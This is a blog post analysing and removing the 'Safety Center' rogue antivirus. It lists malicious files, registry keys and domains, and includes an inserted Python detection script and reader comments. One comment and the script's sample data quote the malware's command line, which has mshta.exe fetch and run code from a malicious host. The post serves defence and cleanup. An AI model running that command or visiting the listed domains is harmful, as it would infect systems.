
Safety Center Analysis and Removal

by Shanmuga

Safety Center is a rogue security software that mimics Windows Security Center and tries to pass itself off as a legitimate security suite. In addition to the various popups, it also uses fake voice alerts and desktop hijacking to scare the user into buying the bogus application. It uses a combination of animated images that give the impression of an online scan to get onto the system. Once installed, it uses the Microsoft HTML Application host (mshta.exe) to access the Internet.


Rogue security software belongs to a family of software products that call themselves antivirus, antispyware or registry cleaners and often use deceptive or high-pressure sales tactics and deliberate false positives to convince users to buy a license or subscription. They are often repackaged and renamed. They do not actually remove malware; instead, many of them add more malware of their own.


Safety Center Associated Files and Folders

  • C:\Program Files\SafetyCenter\protector.exe
  • C:\Documents and Settings\malwarehelp.org\Local Settings\Temp\~5.dll
  • C:\Documents and Settings\malwarehelp.org\Local Settings\Temp\protect.exe
  • C:\Program Files\SafetyCenter\main.ico
  • C:\Program Files\SafetyCenter\sound.wav
  • C:\WINDOWS\Prefetch\PROTECTOR.EXE-0DBCCE3A.pf
  • C:\Documents and Settings\All Users\Application Data\00045109
  • C:\Program Files\SafetyCenter

Safety Center Associated Registry Values and Keys

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B8C60D42-9881-11DE-B7C5-CD5255D89593}
  • HKCR\CLSID\{B8C60D42-9881-11DE-B7C5-CD5255D89593}
  • HKCR\CLSID\{B8C60D42-9881-11DE-B7C5-CD5255D89593}\InprocServer32
  • HKCR\CLSID\{B8C60D42-9881-11DE-B7C5-CD5255D89593}\InprocServer32#ThreadingModel
  • HKU\S-1-5-21-746137067-776561741-1417001333-1004\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B8C60D42-9881-11DE-B7C5-CD5255D89593}

Safety Center Associated Domains

This scareware was observed accessing the following domains during installation and operation:

  • http://ekacleaner info
  • http://3uxyctrlmiqeo cn
  • http://crusade-affiliates com
  • http://urodinam net
  • http://212.117.160 18
  • http://85.17.139 149

Note: Visiting the domains mentioned above may harm your computer system.
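As an added example (not part of the original article), the following Python script shows how a defender might spot the mshta.exe behaviour described above in process-creation logs: mshta.exe normally runs a local .hta file, so a launch whose command line points at a remote http(s) URL is worth alerting on, and the host can be compared against the domains listed above. The record layout and the sample events are constructed for this example.

```python
import re
from urllib.parse import urlsplit

# Hosts from the article's "Associated Domains" list, in plain form for matching.
KNOWN_BAD_HOSTS = {
    "ekacleaner.info", "3uxyctrlmiqeo.cn", "crusade-affiliates.com",
    "urodinam.net", "212.117.160.18", "85.17.139.149",
}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def parse_event(line):
    """Split a constructed 'time|image path|command line' record; None if malformed."""
    parts = line.split("|", 2)
    if len(parts) != 3:
        return None
    time, image, cmdline = (p.strip() for p in parts)
    return {"time": time, "image": image, "cmdline": cmdline}

def classify(event):
    """Return a finding when mshta.exe is launched against a remote URL, else None."""
    exe = event["image"].rsplit("\\", 1)[-1].lower()
    if exe != "mshta.exe":
        return None
    match = URL_RE.search(event["cmdline"])
    if match is None:  # a local .hta argument is the normal use of mshta.exe
        return None
    host = (urlsplit(match.group(0)).hostname or "").lower()
    return {"time": event["time"], "host": host, "known_bad": host in KNOWN_BAD_HOSTS}

def scan(lines):
    """Run classify() over every parsable record and collect the findings."""
    findings = []
    for line in lines:
        event = parse_event(line)
        finding = classify(event) if event is not None else None
        if finding is not None:
            findings.append(finding)
    return findings

# Constructed sample records (the first is modelled on the command line quoted in the comments).
SAMPLE_EVENTS = [
    "2009-11-06 03:00:01|C:\\WINDOWS\\system32\\mshta.exe|mshta.exe http://urodinam.net/33t.php?stime=1254799590",
    "2009-11-06 03:00:02|C:\\WINDOWS\\system32\\mshta.exe|mshta.exe C:\\Program Files\\Vendor\\setup.hta",
    "2009-11-06 03:00:03|C:\\WINDOWS\\explorer.exe|explorer.exe",
    "2009-11-06 04:00:01|C:\\WINDOWS\\system32\\mshta.exe|mshta.exe http://example.invalid/x.php",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

A hit with `known_bad` False still deserves a look, since the remote-URL launch itself is the unusual part.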

Safety Center Removal (How to remove Safety Center)

The free versions of Malwarebytes' Anti-Malware and SuperAntiSpyware appear to remove this rogue security software.

  1. Use an alternate browser like Firefox or Chrome to download and install either Malwarebytes' Anti-Malware or SuperAntiSpyware from the links above.
  2. Also download CCleaner.
  3. Boot into Windows Safe Mode.
  4. Scan with your chosen software. Check all instances of the rogue security software and delete them.
  5. Turn System Restore off and on.
  6. Install CCleaner, then scan and clean the temporary files with it.

You should now be clean of this rogue.

Safety Center — Screenshots

Safety Center — video

Note: The above installation and removal was tested on a fully patched Windows XP SP3 running updated versions of Internet Explorer and Firefox. The content provided in this article is not warranted or guaranteed by Malware Help. Org. The content provided is intended for entertainment and/or educational purposes. I am not liable for any negative consequences that may result from implementing any information covered in this article. The above information is correct at the time of my testing; it might change with time and/or under different testing conditions.


Dave C November 6, 2009 at 3:58 AM

This procedure worked wonderfully on a friend’s diabolically-infested machine. Thanks for the detail and work!


demax November 6, 2009 at 5:24 AM

Thank you for your blog. The method above does get rid of malware or scareware such as “Safety Center”; BUT it does not clean up the mess left behind, such as the annoying recreation of MSHTA.EXE every hour, eating up memory.
[If you don't reboot daily, one will have 20 to 30 mshta.exe running; one can either reboot or terminate the running service (using the Task Manager) without harm.]
The properties of mshta.exe are (using Process Explorer):
Command Line: mshta.exe http ://urodinum. net/33t.php?stime=1254799590

While the file mshta.exe itself is not infected, something instructs mshta.exe to execute, presumably through use of a .xml or .vbs file. The registry is clean; the RUN keys under both HKLM and HKCU are clean. Several registry cleaners, including several rootkit cleaners, are unable to find the monster. Neither NOD32 nor MalwareBytes can, plus several more malware or trojan hunter programs. An “Online Scan” did not either. The only batch file on the computer is “msdtcvtr.bat”, used by MS NT tracerpt, and edit shows no malware execution.

I have taken several pictures (SnagIt) of the malware behavior and would be glad to send them if I knew where to.


de


Shanmuga November 6, 2009 at 8:14 AM

You can upload the images to any free host like imageshack.us and post the link here in a comment, or send them by mail to shanmuga((AT))malwarehelp.org. I can add them to your post.

Awry November 12, 2009 at 12:28 AM

The culprit is a batch file; I think it's in the root of the C: drive. Mine was called BLZ.bat. I edited the bat file, deleting everything in the file, resaved it and then deleted the bat file itself. This, mind you, is after I had the anti-malware destroy the evil intruder. Cleanup is a good pre-cleaning program to use as well, to clear the cache and temp files etc. in one step; pretty thorough. I also looked for the bat file in the registry and other places, after which I set the trusted zones, firewall and Spybot's TeaTimer to block the URL and IP via copy-paste of part of the code in the bat file. The client I have didn't have an antivirus, so I added an active antivirus program that was free, such as AVG. It's good for the basics; of course I used mbam and clamwin.
